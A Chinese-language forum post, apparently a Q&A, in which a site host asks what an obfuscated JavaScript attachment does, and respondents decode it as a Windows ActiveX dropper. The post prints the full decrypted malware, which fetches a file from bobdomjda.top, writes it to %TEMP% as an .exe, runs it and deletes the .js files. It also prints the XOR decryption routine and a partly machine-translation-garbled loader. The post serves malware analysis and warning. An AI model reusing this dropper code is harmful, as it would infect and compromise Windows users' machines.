下面的代码段是做什么的?(JavaScript)


先说一下背景:我目前为几位客户托管了一些小型网站,使用 cPanel 管理。

最近,我在服务器上收到一封带有zip文件的电子邮件。zip文件包含以下代码:

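// Hex-string -> integer helper of the loader (parseInt with radix 16).
// Restored from a machine-translated listing in which `function` / `return`
// had been rendered as Chinese words; the logic itself is unchanged.
// @param {string} luezhqtygz - hex digits (e.g. one "ff" byte pair)
// @returns {number} the parsed value, or NaN for non-hex input
function jqmqmkrehl(luezhqtygz)
{
    return parseInt(luezhqtygz, 16);
}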
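// Returns one random character of "val12312312". In the loader it is called
// several times in a row while the `new Function` source is assembled
// (see the garbled call below) - presumably to build a random identifier;
// the exact use is not recoverable from this listing.
// Restored from a machine-translated listing (`函数`=function, `返回`=return);
// `Math["floo"+""+"r"]` was simply an obfuscated `Math.floor` and is written
// plainly here. Math.random() is not a secure source of randomness, but
// nothing here depends on that.
// @returns {string} a single character drawn from "val12312312"
function jvqissrxgt()
{
    var chars = "val12312312".match(/\S{1}/g);
    return chars[Math.floor(Math.random() * chars.length)];
}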
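// Verbatim duplicate of the jqmqmkrehl declaration above (the later
// declaration wins, with an identical body, so this is harmless - typical
// obfuscator padding). Restored from a machine-translated listing in which
// `function` / `return` had been rendered as Chinese words.
// @param {string} luezhqtygz - hex digits
// @returns {number} the parsed value, or NaN for non-hex input
function jqmqmkrehl(luezhqtygz)
{
    return parseInt(luezhqtygz, 16);
}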
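// Returns the XOR-obfuscated payload as one hex string (two hex digits per
// byte; decoded by the loader with a 12-byte repeating key, see `decrypt`
// further down the page). Restored from a machine-translated listing:
// keywords and the curly string quotes were fixed and the unused `var a=1`
// dropped. The hex content is kept byte-for-byte as posted, and it is
// visibly damaged by the translation (a space and a stray "之前" in the
// sixth chunk, a space in the seventh, extra digits compared with the
// cleaned copy later on the page) - use the cleaned listing below, not this
// one, if you want to decode the blob. Data only; never eval() the result.
// @returns {string} hex-encoded ciphertext
function sehudashf()
{
    var lzpxyboxat = "F0F70CA69F56833161C510CEBD2E316A4AD4D831569405B7E3F00EE9CB5C8D14505408FCFDAB19B19946970E5D4449E7FBEE2AB19F4FCC451C580CE8B6C301B182498920735403FAF5F64AE7A66CB4357047C7DBCE2A91BF6FCE51074E04F3DEF616B5" +
        "C5509C1D521E4BD8D3D640E9CB4A9E1410160FFEFAFF107ECD047811474421DEFB8F107AB8F17C54355049B7EEEF0E8D9F4B9C564F4208EBE3F142F8D61DE480C1F49E4E4E716B09951CB1B5A05FDF7E1095280304842219B1C4E711B584519F1D" +
        "7E590DE6BAA204A4874C8951074B0CF3E5E719B78E4B990A52160AFEFEE00A48854C416495A05B3B6F610B08E16D705415508EBF5EA42ED8E4D9E174E1F12EDF3F617B7851F8F19505A0BFEF5E94AAB9E5380541C421BEF359B8999916F4200F0" +
        "F8A205A09F7B8D0C5D1E0AFEFAE00A48854C503484410E4F1E716818A4B8D3E5E5904AE4EE4AE7834B9808061946FDF9E006AA86558819124206EFB9E306A88251C085444656F9AB04CA28259CE541C501CF1F5F60BA85179E1D4F4305EBBAA207B7" +
        "99509E511C4D00F9B6AA43A0994D830A154D1BFAE2F710ABCB5C8D14505408FCFDAA10A0984A800C10160FFEFAF107ECD04289144F5312F8F3F626A49F5EAA0A535B3CEDFAA40AD9F4B9C4213190BF0F4E60DA8815B8D56485919B07E60FAC85119C10" +
        "4C090FA2A4 AC05AC8D1DC0585A4307FCE2EB0DABC34D890B495A1DB3B6E710B7844DC558475F0FBEA307B799509E5147440CEBE3F00CE58855E80145E570AF4BE3F00CE588541C5008F3E5E74BFE965A800B594D0EFAE2C03B18A799E17531BF3之前" +
        "BEA00AB19F4FD657135406FDF2ED0FAF8F5EC20C534646FEF2EF0BABC54F8408035044ADB8E50BA3C913CC1E49580AEBFFED0CED995A9F0D504245BFF3F010AA9916CC03555049B7E710B7844DC5034E531DEAE 4EC42A68A53801A5D5502B7E47E711B0" +
        "874BC058A5705ECF3AB59B88E539F1D47440CEBE3F00CE5885E80145E570AF4BEEC17A98713CC0C4E430CB6ADFF1FECD042951074B14B6ADFF01A49F5C845814531BED9F04BE995A980D4E5849FCF7EE78A5C875052430F3BAA216B79E5AC543" +
        "414B0FEAF8E116AC8451CC1F59423DFAFBF224AC875ABC19485E41B6EDF610BC90498D0A1C501ABFABA20CA09C1FAD1B485F1FFACD00AF8E5C98501E650AEDFF216AC8558C23E555A0CCEFF116A086708E1259551DBFB914A4991F98154C7000F3" +
        "F3CC03A88E1FD1581E6A35BDB6A942888A4B84564E5707FBF9EF4AECC54B832B484400F1AA51F3C2119F0D5E451DEDBB04EE5D216CC531C1447FAEEE740FE9D5E9E58E584B845801160FECB8C507B18491B55705D9F9EE06A0" +
        "9917DE511C1D49EBFBF224AC875AA219515352EDF3F617B7851F98154C7000F3F3D203B18304911B5D420AF7B6AA07B799509E5147440CEBE3F00CE58D5E800B590D14E2F0F70CA69F56833161C4508E9F3D60D918E529C5058571DFEBAA201A487538E19" +
        "5F5D40E4E2F01BFE9E5E9E584C571DF7B6BF42A2828E4B81D51462F6FAE732A49F57C451075F0FBEF203B18316970E5D4449F0F4E831B1995A8D151C0B49F1F3428B850E596FDFCE701B1C31AD3C73722BFB1C5610A08A52CE5107590BF5" +
        "C5F610A08A52C2374C5307BFB90DA7816C980A595704B12A0CB02CC4907590BF5C5F610A08A52C22F4E5F1DFABEE603B18A16D7175E5C3AEBE4E703A8C56F830B55420F0F8A25FE5DB04831A56651EDF30FEBB85E9A1D68592F6FAE74AB5" +
        "8A4B84541C0440A4F9E008969F4D891951182AF3F9F107EDC2049E1D48431BF1B6E103A9875D8D1B5711EE5E800B591F52E2F3EE11A0CB449E1D48431BF1B6E103A9875D8D1B57E07EAFAEE59F4D991D150D14F5711A6831FC41D" +
        "4E4406EDBFF910A09F4A9E161C5508F3FAE003A68017820D505A45BFE2F017A0C20491055B531DDBF7F603ED8D4A821B485F06F1B6A049F5EC05859441BF0E4AB42BE8259CC501D531BED9F04BBE985E9A1D68593DFAFBF24AA18A4B8D541C501CF1" +
        "F5F60BAA851FC40855D4201B3B6E710B7844DC558475F0FBEA307B799509E5147421BEDF403B7CB489F101C0B49F1F3F54284844B850E596FDFCE701B1C31DBB5F4400EFE2AC31AD8E53805A150D1EECFEAC30B08517CE1B515247FAEE742EA" +
        "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
    return lzpxyboxat;
}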
// Loader stage: decrypts the hex blob and runs the result. This listing is
// machine-translated and NOT runnable as shown: `函数`=function, `尝试`=try,
// `捕获`=catch, `打破`=break, `返回`=return, `新函数`=new Function, `对于`=for.
// The name's case is also mangled (declared YNEPEAQZWU, called as
// yneepaqzwu below, parameter YLUYZUVPS vs. yluyzuvvps).
函数YNEPEAQZWU(YLUYZUVPS)
{
var mfjvremiuf;
// Retry forever: build + run the generated function until it does not
// throw, then break. The empty catch swallows every error.
while(true){
尝试
{
// `new Function(...)` is eval in disguise. What survives of its source text:
// a key array whose numbers were run together by the translation
// (150130,98197235,63236120,60,54105159 == the 12 bytes 150,130,98,197,235,
// 63,236,120,60,54,105,159 used by the cleaned `decrypt` later on the page),
// a /\S{2}/g split of the hex argument into byte pairs, and a
// String.fromCharCode(... ^ key) XOR loop. It presumably eval()s the decoded
// text (the page below shows that text is the ActiveX dropper). The rest of
// this line is garbled beyond recovery - do not try to repair or run it.
mfjvremiuf=(新函数(“uneuuflaii”,“var zkyczguxoo=new Array(150130,98197235,63236120,60,54105159),htcpxtvter=uneuuflaii.match(/\\S{2}/g),xjrefvhonb=\“\”,ftvjsrrtfs=0;对于(var ftvjsrrtfs=0,wgwizghjb=0;ftvjsrrtfs=zkyczkyczguxoo.length){wgwizghjb=0;^xjrefvhonb+=String.fromcpvjvjsrzgwgzgjjjwgjjjjjvvvjsjjjwwwgjjjjwwwwjjjjjjjjjjwjjjjjjjjjjjjjwwwwjjjjj+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+“(xjrefvhonb);”)(yluyzuvvps));
打破
}
捕获(er)
{
}
}
返回mfjvremiuf;
}

`YNEPEAQZWU(sehudashf())`(原文此处的函数名大小写已被翻译破坏)——它的作用如下:代码先解密那个很长的字符串变量(`var lzpxyboxat="f0f70ca69f5683161c510c…"`,十六进制编码,再与一个 12 字节密钥做重复异或),解密出来的字符串本身又是一段 JavaScript,随后被执行。下面是解密后的代码:

// MALWARE ANALYSIS ANNOTATION - do not run. Fetches `url` with a synchronous
// MSXML2.XMLHTTP request. This is an ActiveX object, which is why the whole
// dropper only works under Windows Script Host / Internet Explorer.
// On HTTP 200 the raw binary body (ResponseBody) is passed to
// callback(data, false); any other status, or any exception (no ActiveX,
// network failure), is reported as callback(null, true).
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // false = synchronous: blocks until the download finishes
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false); // binary body, not responseText
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

// MALWARE ANALYSIS ANNOTATION - do not run. Downloads the second-stage
// payload from the hard-coded C2 URL, retrying the same URL up to three
// times (nested callbacks, identical URL each time). The ".gif" in the URL
// is a disguise: the body is later written to disk as an .exe (see
// getTempFilePath). All three attempts failing yields callback(null, true).
// Indicator for network monitoring: GET http://bobdomjda.top/admin.php?f=2.gif
function getData(callback) {
    try {
        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // Retry #2, same URL.
                getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Retry #3, same URL; give up afterwards.
                        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

// MALWARE ANALYSIS ANNOTATION - do not run. Builds the drop path:
// <temp folder>\<random base-36 string>.exe. GetSpecialFolder(2) is the
// FileSystemObject TemporaryFolder constant (the user's %TEMP%). The name
// is up to 9 random characters, so there is no fixed filename to hunt for -
// hunt for "*.exe created under %TEMP% by wscript/cscript" instead.
// Returns false when the ActiveX object is unavailable (non-Windows hosts).
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

// MALWARE ANALYSIS ANNOTATION - do not run. Writes the downloaded bytes to
// the temp path via ADODB.Stream: Type = 1 is adTypeBinary, SaveToFile(path, 2)
// is adSaveCreateOverWrite. On success callback(path, false) hands the
// location of the dropped executable to the caller; any failure (no temp
// path, ActiveX missing, write error) becomes callback(null, true).
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1; // binary stream
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2); // overwrite if it exists
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

// MALWARE ANALYSIS ANNOTATION - do not run. Execution chain of the dropper:
// download -> write to %TEMP% as .exe -> launch. Every failure is swallowed
// silently, so the victim sees nothing either way.
getData(function (data, error) {
    if (!error) {
        saveToTemp(data, function (path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    // `start <path>` launches the dropped executable; `& del *.js`
                    // then deletes every .js file in cmd's working directory
                    // (presumably the folder the script was opened from) to
                    // remove the loader itself. Detection hint: wscript.exe /
                    // cscript.exe spawning cmd.exe with "start" on a %TEMP%\*.exe.
                    wsh.Run("cmd.exe /c start " + path + " & del *.js");
                } catch (error) {
                }
            }
        });
    }
});
此代码从 URL `http://bobdomjda.top/admin.php?f=2.gif` 下载一个文件(警告:该文件很可能是恶意的,不要在普通机器上访问这个地址)。下载内容以随机文件名加 .exe 后缀保存在临时文件夹中,然后通过 `cmd.exe /c start [filename]` 执行,随后再用 `del *.js` 删除当前目录下的所有 .js 文件以清理加载器自身的痕迹。

据我所知,这个下载并执行的过程只能在 Windows 上工作——它依赖的 ActiveX 对象(MSXML2.XMLHTTP、Scripting.FileSystemObject、ADODB.Stream、WScript.Shell)只存在于 Windows Script Host / Internet Explorer 环境中。


我已将该文件上传到 VirusTotal(原文中的报告链接在此处已丢失)。

用脚本整理(去混淆)之后得到:

// Cleaned-up copy of the loader's `lzpxyboxat` blob: hex, two digits per byte,
// XOR-encrypted with the 12-byte repeating key used by decrypt() below.
// Its first twelve bytes decode to "function get" - the start of the
// getDataFromUrl dropper listed above. Data only; never eval() the decrypted
// result.
var encrypted =
    "f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
    "c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
    "7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
    "f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
    "99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
    "4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
    "bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
    "874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
    "414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
    "f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
    "9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
    "5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
    "c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
    "8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
    "4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
    "f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
    "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";

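/**
 * Reverses the loader's string obfuscation: the blob is a hex string, two hex
 * digits per byte, XORed with a repeating 12-byte key. Decoding the page's
 * blob with the default key yields JavaScript starting "function get..." -
 * the ActiveX dropper listed above.
 *
 * BUG FIX: the original read `encoded` (an undefined name) instead of the
 * `encrypted` parameter and would throw a ReferenceError on every call.
 *
 * @param {string} encrypted - hex-encoded ciphertext; whitespace between
 *   byte pairs is ignored (the /\S{2}/g split skips it)
 * @param {number[]} [key] - XOR key bytes; defaults to the 12-byte key taken
 *   from the loader's `new Array(...)` literal
 * @returns {string} the decoded text ("" for empty input). Treat it as data:
 *   never pass it to eval() / new Function.
 */
function decrypt(encrypted, key) {
    var xorKey = key || [150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159];
    // `|| []` keeps an empty or whitespace-only input from crashing on null.match.
    var bytes = encrypted.match(/\S{2}/g) || [];
    var code = "";

    for (var i = 0; i < bytes.length; i++) {
        // Repeating-key XOR: the key index wraps every xorKey.length bytes.
        code += String.fromCharCode(parseInt(bytes[i], 16) ^ xorKey[i % xorKey.length]);
    }

    return code;
}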

// eval(decrypt(encrypted)); // commented out to prevent accidental execution
这个脚本:

  • 从 http://bobdomjda.top/admin.php?f=2.gif 下载一个文件(同一地址最多尝试三次;“.gif”只是伪装,内容会按 .exe 写入)
  • 使用 ActiveX(“Scripting.FileSystemObject”、“ADODB.Stream”)把它以随机文件名保存到本地临时目录,例如 “owynovqn2.exe”
  • 使用 ActiveX(“WScript.Shell”)通过 `cmd.exe /c start` 执行它,然后用 `del *.js` 删除当前目录下的 .js 文件以清理痕迹

  • 据统计,61个病毒扫描程序中有8个将可执行文件识别为恶意文件,例如McAfee将其分类为“Behavelike.Win32.Ransom.dc”。

    (评论一)它被混淆了,故意写得难以理解。不要使用它;好好去学 JS。(评论二)“最近,我在服务器上收到一封带有 zip 文件的电子邮件”——几乎可以肯定是恶意的,直接扔进垃圾桶即可。下面是对这段潜在恶意 JS 代码整理后的版本,真正执行可执行文件的那一行已被注释掉(注意:它仍然会联网下载并把文件写入临时目录,因此也不要运行):
    // MALWARE ANALYSIS ANNOTATION - do not run. Synchronous MSXML2.XMLHTTP GET
    // (ActiveX: Windows Script Host / Internet Explorer only). HTTP 200 hands
    // the raw binary body to callback(data, false); any other status or any
    // exception is reported as callback(null, true).
    function getDataFromUrl(url, callback) {
        try{
            var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
            xmlHttp.open("GET", url, false); // false = synchronous
            xmlHttp.send();
            if (xmlHttp.status == 200) {
                return callback(xmlHttp.ResponseBody, false); // binary body
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    // MALWARE ANALYSIS ANNOTATION - do not run. Fetches the second-stage
    // payload from the hard-coded C2 URL, retrying the identical URL up to
    // three times via nested callbacks; ".gif" is a disguise for an .exe.
    // NOTE: this function is NOT defused in this copy - calling it still
    // contacts bobdomjda.top.
    function getData(callback) {
        try {
            getDataFromUrl(
                "http://bobdomjda.top/admin.php?f=2.gif",
                function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Retry #2, same URL.
                        getDataFromUrl(
                            "http://bobdomjda.top/admin.php?f=2.gif",
                            function(result, error) {
                                if (!error) {
                                    return callback(result, false);
                                } else {
                                    // Retry #3, same URL; give up afterwards.
                                    getDataFromUrl(
                                        "http://bobdomjda.top/admin.php?f=2.gif",
                                        function(result, error) {
                                            if (!error) {
                                                return callback(result, false);
                                            } else {
                                                return callback(null, true);
                                            }
                                        }
                                    );
                                }
                            }
                        );
                    }
                }
            );
        } catch (error) {
            return callback(null, true);
        }
    }
    
    // MALWARE ANALYSIS ANNOTATION - do not run. Drop path:
    // <temp folder>\<up to 9 random base-36 chars>.exe. GetSpecialFolder(2)
    // is the FileSystemObject TemporaryFolder constant (%TEMP%). Returns
    // false when the ActiveX object is unavailable.
    function getTempFilePath() {
        try {
            var fs = new ActiveXObject("Scripting.FileSystemObject");
            var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
            var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
            return tmpFilePath;
        } catch (error) {
            return false;
        }
    }
    
    // MALWARE ANALYSIS ANNOTATION - do not run. Writes the downloaded bytes
    // to the temp path via ADODB.Stream (Type = 1 is adTypeBinary,
    // SaveToFile(path, 2) is adSaveCreateOverWrite) and returns the path via
    // callback(path, false). NOTE: this step is NOT defused in this copy -
    // it still drops an executable into %TEMP%.
    function saveToTemp(data, callback) {
        try {
            var path = getTempFilePath();
            if (path) {
                var objStream = new ActiveXObject("ADODB.Stream");
                objStream.Open();
                objStream.Type = 1; // binary stream
                objStream.Write(data);
                objStream.Position = 0;
                objStream.SaveToFile(path, 2); // overwrite if it exists
                objStream.Close();
                return callback(path, false);
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    // Execution chain with the launch line commented out. NOTE(review): this
    // copy is only PARTIALLY defused - running it still contacts
    // bobdomjda.top and writes the downloaded binary to %TEMP% as a random
    // .exe; only the `cmd.exe /c start <path> & del *.js` step (launch the
    // dropped file, then delete the loader's .js files) is disabled, and
    // `wsh` is now created but unused. Treat the whole listing as data.
    getData(
        function (data, error) {
            if (!error) {
                saveToTemp(
                    data,
                    function (path, error) {
                        if (!error) {
                            try {
                                var wsh = new ActiveXObject("WScript.Shell");
                                // wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
                            } catch (error) {}
                        }
                    }
                );
            }
        }
    );